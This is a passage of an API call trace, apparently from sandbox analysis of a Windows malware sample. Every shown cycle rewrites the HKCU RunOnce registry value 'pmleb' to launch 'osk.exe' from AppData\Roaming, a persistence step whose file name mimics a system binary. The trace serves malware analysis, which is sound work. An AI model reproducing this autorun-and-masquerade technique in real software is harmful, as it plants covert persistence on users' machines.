hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.647] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.647] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.648] KillTimer (hWnd=0x20280, uIDEvent=0x22a6) returned 1 [0096.648] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.648] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.649] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.649] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.649] RegCloseKey (hKey=0x280) returned 0x0 [0096.649] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.649] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.649] SetTimer (hWnd=0x20280, nIDEvent=0x22a7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a7 [0096.649] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.663] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.663] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.663] KillTimer (hWnd=0x20280, uIDEvent=0x22a7) returned 1 [0096.664] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.664] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.664] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.665] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.665] RegCloseKey (hKey=0x280) returned 0x0 [0096.665] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.665] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.665] SetTimer (hWnd=0x20280, nIDEvent=0x22a8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a8 [0096.665] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.679] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.679] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.680] KillTimer (hWnd=0x20280, uIDEvent=0x22a8) returned 1 [0096.680] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.680] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.680] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.681] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.681] RegCloseKey (hKey=0x280) returned 0x0 [0096.681] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.681] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.681] SetTimer (hWnd=0x20280, nIDEvent=0x22a9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a9 [0096.681] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.694] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.694] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.694] KillTimer (hWnd=0x20280, uIDEvent=0x22a9) returned 1 [0096.695] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.695] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.695] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.696] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.696] RegCloseKey (hKey=0x280) returned 0x0 [0096.696] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.696] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.696] SetTimer (hWnd=0x20280, nIDEvent=0x22aa, uElapse=0xa, lpTimerFunc=0x0) returned 0x22aa [0096.696] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.734] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.734] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.734] KillTimer (hWnd=0x20280, uIDEvent=0x22aa) returned 1 [0096.734] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.735] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.735] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.735] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.736] RegCloseKey (hKey=0x280) returned 0x0 [0096.736] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.736] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.736] SetTimer (hWnd=0x20280, nIDEvent=0x22ab, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ab [0096.736] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.741] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.741] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.741] KillTimer (hWnd=0x20280, uIDEvent=0x22ab) returned 1 [0096.741] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.742] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.742] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.742] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.742] RegCloseKey (hKey=0x280) returned 0x0 [0096.742] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.743] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.743] SetTimer (hWnd=0x20280, nIDEvent=0x22ac, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ac [0096.743] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.757] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.757] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.757] KillTimer (hWnd=0x20280, uIDEvent=0x22ac) returned 1 [0096.757] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.757] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.758] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.758] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.758] RegCloseKey (hKey=0x280) returned 0x0 [0096.758] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.758] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.758] SetTimer (hWnd=0x20280, nIDEvent=0x22ad, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ad [0096.758] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.772] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.772] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.773] KillTimer (hWnd=0x20280, uIDEvent=0x22ad) returned 1 [0096.773] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.773] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.773] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.773] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.774] RegCloseKey (hKey=0x280) returned 0x0 [0096.774] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.774] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.774] SetTimer (hWnd=0x20280, nIDEvent=0x22ae, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ae [0096.774] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.788] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.788] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.788] KillTimer (hWnd=0x20280, uIDEvent=0x22ae) returned 1 [0096.789] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.789] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.789] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.789] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.789] RegCloseKey (hKey=0x280) returned 0x0 [0096.790] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.790] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.790] SetTimer (hWnd=0x20280, nIDEvent=0x22af, uElapse=0xa, lpTimerFunc=0x0) returned 0x22af [0096.790] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.803] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.804] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.804] KillTimer (hWnd=0x20280, uIDEvent=0x22af) returned 1 [0096.804] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.804] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.805] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.805] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.805] RegCloseKey (hKey=0x280) returned 0x0 [0096.805] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.805] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.805] SetTimer (hWnd=0x20280, nIDEvent=0x22b0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b0 [0096.805] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.819] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.819] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.820] KillTimer (hWnd=0x20280, uIDEvent=0x22b0) returned 1 [0096.820] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.820] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.820] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.821] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.821] RegCloseKey (hKey=0x280) returned 0x0 [0096.821] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.821] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.821] SetTimer (hWnd=0x20280, nIDEvent=0x22b1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b1 [0096.821] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.835] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.835] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.835] KillTimer (hWnd=0x20280, uIDEvent=0x22b1) returned 1 [0096.835] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.835] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.835] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.836] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.836] RegCloseKey (hKey=0x280) returned 0x0 [0096.836] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.836] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.836] SetTimer (hWnd=0x20280, nIDEvent=0x22b2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b2 [0096.836] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.850] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.850] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.850] KillTimer (hWnd=0x20280, uIDEvent=0x22b2) returned 1 [0096.851] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.851] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.851] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.851] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.852] RegCloseKey (hKey=0x280) returned 0x0 [0096.852] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.852] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.852] SetTimer (hWnd=0x20280, nIDEvent=0x22b3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b3 [0096.852] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.866] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.866] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.866] KillTimer (hWnd=0x20280, uIDEvent=0x22b3) returned 1 [0096.866] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.867] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.867] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.867] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.867] RegCloseKey (hKey=0x280) returned 0x0 [0096.867] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.868] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.868] SetTimer (hWnd=0x20280, nIDEvent=0x22b4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b4 [0096.868] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.882] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.882] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.882] KillTimer (hWnd=0x20280, uIDEvent=0x22b4) returned 1 [0096.882] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.883] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.883] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.883] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.883] RegCloseKey (hKey=0x280) returned 0x0 [0096.883] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.883] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.883] SetTimer (hWnd=0x20280, nIDEvent=0x22b5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b5 [0096.883] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.897] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.897] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.897] KillTimer (hWnd=0x20280, uIDEvent=0x22b5) returned 1 [0096.898] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.898] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.898] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.898] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.898] RegCloseKey (hKey=0x280) returned 0x0 [0096.898] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.899] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.899] SetTimer (hWnd=0x20280, nIDEvent=0x22b6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b6 [0096.899] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.913] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.913] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.913] KillTimer (hWnd=0x20280, uIDEvent=0x22b6) returned 1 [0096.913] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.913] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.914] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.914] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.914] RegCloseKey (hKey=0x280) returned 0x0 [0096.914] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.914] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.914] SetTimer (hWnd=0x20280, nIDEvent=0x22b7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b7 [0096.914] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.929] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.929] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.929] KillTimer (hWnd=0x20280, uIDEvent=0x22b7) returned 1 [0096.930] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.930] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.930] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.930] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.931] RegCloseKey (hKey=0x280) returned 0x0 [0096.931] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.931] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.931] SetTimer (hWnd=0x20280, nIDEvent=0x22b8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22b8 [0096.931] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.944] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.944] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.944] KillTimer (hWnd=0x20280, uIDEvent=0x22b8) returned 1 [0096.944] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.945] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.945] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | 